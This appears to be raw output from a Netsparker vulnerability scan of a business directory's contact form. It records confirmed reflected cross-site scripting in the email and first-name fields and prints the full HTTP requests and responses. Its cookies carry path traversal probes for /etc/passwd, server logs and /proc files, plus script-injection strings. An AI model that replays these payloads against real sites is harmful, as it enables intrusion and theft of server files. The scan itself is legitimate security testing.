<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000B9F)</script>" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST '"--></style></script><script>alert(0x000BBC)</script>
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 242
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BBC)%3c%2fscript%3e&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:11 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=704C1101476EED0A9208F7BBBA4809EF; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000BBC)</script>" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" formError" /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td width="473..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x000BE2)</script>
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
